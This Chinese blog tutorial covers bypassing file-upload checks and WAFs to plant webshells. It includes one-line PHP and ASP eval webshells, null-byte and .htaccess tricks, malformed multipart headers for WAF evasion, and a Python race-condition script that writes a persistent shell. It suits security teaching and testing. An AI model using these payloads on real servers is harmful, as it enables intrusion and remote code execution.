上传一个PHP文件 点开网络查看 下面未有请求(同时弹窗说文件不合法) 这时候需要抓包 改包里的文件格式(在script标签里的格式)然后可上传一句话木马进行绕过 **服务端MIME绕过** MIME检测的是数据包content-type字段 常见图片格式的MIME类型有以下几种类型 PNG图像:image/png GIF图像:image/gif JPG图像:image/jpeg 点击上传 上传的是PHP文件 提示 只允许上传图片文件 这时候需要进行抓包 抓完包 更改content-type字段 修改为图片格式的值 **服务端目录检测绕过(较少)** 文件上传时,有的程序允许用户将文件放到指定目录中,如果指定目录存在就将文件写入目录,不存在则先建立目录,然后写入(IIS中间件版本为6.0时)xxxx.asp aaaaa.jpg 上传jpg文件上传成功 抓包 抓完以后 将文件夹改为xxx.asp 然后上传成功 (阿帕奇无这种解析漏洞) **服务端拓展名检测绕过** 黑名单: **1.大小写组合绕过** pHp AsP 上传PHP文件 提示文件不合法 需要抓包 将PHP大小写混合 改一句话 **2.特殊文件名绕过** 再Windows下有一个特性就是如果文件后缀以点‘.’或者空格‘ ’结尾的后缀名时,系统在保存文件时会自动去除点和空格。但要注意Uinx/Linux系统没有这个特性 window上传PHP 不合法 先进行抓包 然后改文件名 把后面加一个. 然后发送数据包显示上传2.php.成功 **3.0x00截断绕过 asp程序居多** 文件名后缀有一个%00字节,可以截断某些函数对文件名的判断。在许多语言函数中,处理字符串的函数中0x00被认为是终止符 例如:网站上传函数处理xxx.asp%00.jpg时,首先后缀名是合法的jpg格式,可以上传,在保存文件时,遇到%00字符丢弃后面的.jpg,文件后缀最终保存的后缀名为xxx.asp 上传1.asp.jpg文件 抓取数据包 在数据包1.asp.jpg的‘asp’后面加上一个空格(空格的16进制为0x20方便寻找) 然后选中‘Hex’找到‘20’,将其改为00 然后发送数据包 显示上传成功 上传的是1.asp 而非jpg文件 **4.htaccess文件攻击** .htaccess文件内容 <FilesMatch "haha"> SetHandler application/x-httpd-php </FilesMatch> 上传文件 抓包 将文件名改为haha ,haha出现在哪都行,然后改PHPinfo 然后发送数据包 发现上传成功 但未被解析 这时候需要再上传一个文件.htaccess 上传的时候不加点(因为点开头的 是隐藏文件) 抓住完以后 加一个点 然后发送数据包 发现原来文件可以被解析执行 白名单: **1.0x00截断绕过** 用像test.asp%00.jpg的方式进行截断,属于白名单文件 **2.解析/包含漏洞绕过** 这类漏洞直接配合上传一个代码注入过的白名单文件即可,再利用解析/包含漏洞 绕过文件内容检测 **1.制作图片马** 需要一张图片和一个php文件(windows下制作) shift右键 打开命令窗口输入 copy test.png/b+shell.php/a 2.png 参数/b指定以二进制格式复制,合并文件;用于图像类/声音类文件 参数/a指定以ASCII格式复制,合并文件。用于txt等文档类文件 (Linux下制作)cat test.jpg 2.php > xxx.jpg 制作完成之后 上传图片马 进行抓包 修改后缀 改为php 之后上传成功 打开菜刀进行连接 **5.解析漏洞(不是代码问题 是中间件解析出现的问题)** **1.Apache解析漏洞** 一个文件名为test.php.aaa.bbb.ccc的文件,Apache会从ccc的位置往php的位置尝试解析,如果ccc不属于Apache能解析的后缀名,那么Apache就会尝试去解析bbb,这样一直往前尝试,知道遇到一个能解析的拓展名为止 2**.IIS6.0有两个解析漏洞**,一个是如果目录名包.asp,.asa,.cer字符串,那么这个目录下所有的文件都会按照asp去解析 例如:“test.asp/1.jpg” 另一个是只要文件名中含有.asp,.asa,.cer会优先按asp来解析 例如:“1.asp;.jpg” **iis7.0/7.5**是对php解析时有一个类似于Nginx的解析漏洞,对任意文件名只要在URL后面追加上字符串“/任意文件名.php”就会按照php的方式去解析 重点!!!! **上传漏洞的检测框架** (1)寻找上传点 网站前台的上传点一般会有头像上传,附件上传,证件认证上传。如果通过SQL注入或者其它一些技术手段得到网站后台权限,一般在网站更新页面的地方存在上传点。也可以通过敏感目录或者文件扫描工具扫到一些开源编辑器的测试上传页面等等 (2)找到上传点后,先上传一张正常的图片测试该上传点时候可用 (3)上传一张正常的图片,抓包修改文件后缀名为对应网站脚本语言 该操作可以绕过前端检测,MIME检测,文件内容检测,可以检测出网站是否对上传文件进行了文件后缀名的检测 如果上传成功表示没有对文件后缀名进行检测,可以进一步上传图片马,抓包修改后缀名为对应网站脚本语言即可获取webshell。 如果上传失败表示对文件名后缀进行了检测,需要进一步判断是黑名单检测还是白名单检测 (4)上传一张正常的图片,在它后缀随便添加几个字符进行上传 例如:“1.jpgaaaaa”该后缀的文件既不在黑名单之内也不在白名单之内,如果文件上传成功代表是黑名单检测,如果上传失败代表是白名单检测 (5)黑名单检测绕过 >文件名大小写绕过 >特殊文件名绕过 >0x00截断绕过 >.htaccess文件攻击 >php文件包含漏洞 >Apache解析漏洞 >Nginx解析漏洞 (6)白名单检测绕过 >0x00截断绕过 >php文件包含漏洞 >IIS解析漏洞 >Nginx解析漏洞 ## WAF绕过 ### 7.1 垃圾数据 有些主机WAF软件为了不影响web服务器的性能,会对校验的用户数据设置大小上限,比如1M。此种情况可以构造一个大文件,前面1M的内容为垃圾内容,后面才是真正的木马内容,便可以绕过WAF对文件内容的校验  当然也可以将垃圾数据放在数据包最开头,这样便可以绕过对文件名的校验。  可以将垃圾数据加上Content-Disposition参数后面,参数内容过长,可能会导致waf检测出错。 ### filename 针对早期版本安全狗,可以多加一个filename  或者将filename换位置,在IIS6.0下如果我们换一种书写方式,把filename放在其他地方:  ### POST/GET 有些WAF的规则是:如果数据包为POST类型,则校验数据包内容。 此种情况可以上传一个POST型的数据包,抓包将POST改为GET。 ### 以上方式 针对WAF,以上介绍的服务器解析漏洞、文件包含漏洞等都可以尝试绕过。 ### 利用waf本身缺陷 #### 删除实体里面的Conten-Type字段  第一种是删除Content整行,第二种是删除C后面的字符。删除掉ontent-Type: image/jpeg只留下c,将.php加c后面即可,但是要注意额,双引号要跟着c.php。 ``` 正常包:Content-Disposition: form-data; name="image"; filename="085733uykwusqcs8vw8wky.png"Content-Type: image/png 构造包:Content-Disposition: form-data; name="image"; filename="085733uykwusqcs8vw8wky.png C.php" ``` ### 删除Content-Disposition字段里的空格  ``` 增加一个空格导致安全狗被绕过案列: Content-Type: multipart/form-data; boundary=—————————4714631421141173021852555099 尝试在boundary后面加个空格或者其他可被正常处理的字符: boundary= —————————47146314211411730218525550 ``` ### 修改Content-Disposition字段值的大小写  ### Boundary边界不一致 每次文件上传时的Boundary边界都是一致的: ``` Content-Type: multipart/form-data; boundary=---------------------------4714631421141173021852555099 Content-Length: 253 -----------------------------4714631421141173021852555099 Content-Disposition: form-data; name="file1"; filename="shell.asp" Content-Type: application/octet-stream <%eval request("a")%> -----------------------------4714631421141173021852555099-- ``` 但如果容器在处理的过程中并没有严格要求一致的话可能会导致一个问题,两段Boundary不一致使得waf认为这段数据是无意义的,可是容器并没有那么严谨: Win2k3 + IIS6.0 + ASP  文件名处回车  ### 多个Content-Disposition 在IIS的环境下,上传文件时如果存在多个Content-Disposition的话,IIS会取第一个Content-Disposition中的值作为接收参数,而如果waf只是取最后一个的话便会被绕过,Win2k8 + IIS7.0 + PHP  ### 利用NTFS ADS特性 ADS是NTFS磁盘格式的一个特性,用于NTFS交换数据流。在上传文件时,如果waf对请求正文的filename匹配不当的话可能会导致绕过  ### 文件重命名绕过 如果web程序会将filename除了扩展名的那段重命名的话,那么还可以构造更多的点、符号等等。  ### 特殊的长文件名绕过 文件名使用非字母数字,比如中文等最大程度的拉长,不行的话再结合一下其他的特性进行测试: shell.asp;王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王.jpg ### 反删除 将下图file1改成了file4,这样就不会把这个文件删除了。(JCMS漏洞)  ### 竞争上传 演示代码: ```php <?php $allowtype = array("gif","png","jpg"); $size = 10000000; $path = "./"; $filename = $_FILES['file']['name']; if(is_uploaded_file($_FILES['file']['tmp_name'])){ if(!move_uploaded_file($_FILES['file']['tmp_name'],$path.$filename)){ die("error:can not move"); } }else{ die("error:not an upload file!"); } $newfile = $path.$filename; echo "file upload success.file path is: ".$newfile."\n<br />"; if($_FILES['file']['error']>0){ unlink($newfile); die("Upload file error: "); } $ext = array_pop(explode(".",$_FILES['file']['name'])); if(!in_array($ext,$allowtype)){ unlink($newfile); die("error:upload the file type is not allowed,delete the file!"); } ?> ``` 首先将文件上传到服务器,然后检测文件后缀名,如果不符合条件,就删掉,我们的利用思路是这样的,首先上传一个php文件,内容为: ```php <?php fputs(fopen("./info.php", "w"), '<?php @eval($_POST["drops"]) ?>'); ?> ``` 当然这个文件会被立马删掉,所以我们使用多线程并发的访问上传的文件,总会有一次在上传文件到删除文件这个时间段内访问到上传的php文件,一旦我们成功访问到了上传的文件,那么它就会向服务器写一个shell。利用代码如下: ```python import os import requests import threading class RaceCondition(threading.Thread): def __init__(self): threading.Thread.__init__(self) self.url = "http://127.0.0.1:8080/upload/shell0.php" self.uploadUrl = "http://127.0.0.1:8080/upload/copy.php" def _get(self): print('try to call uploaded file...') r = requests.get(self.url) if r.status_code == 200: print("[*]create file info.php success") os._exit(0) def _upload(self): print("upload file.....") file = {"file":open("shell0.php","r")} requests.post(self.uploadUrl, files=file) def run(self): while True: for i in range(5): self._get() for i in range(10): self._upload() self._get() if __name__ == "__main__": threads = 20 for i in range(threads): t = RaceCondition() t.start() for i in range(threads): t.join() ``` 经过几次尝试后成功成功写入shell Last modification:July 14th, 2020 at 02:30 pm © 允许规范转载 Support 如果觉得我的文章对你有用,请随意赞赏 ×Close Appreciate the author Sweeping payments Pay by AliPay Pay by WeChat
好用心,点赞
海星吧哈哈哈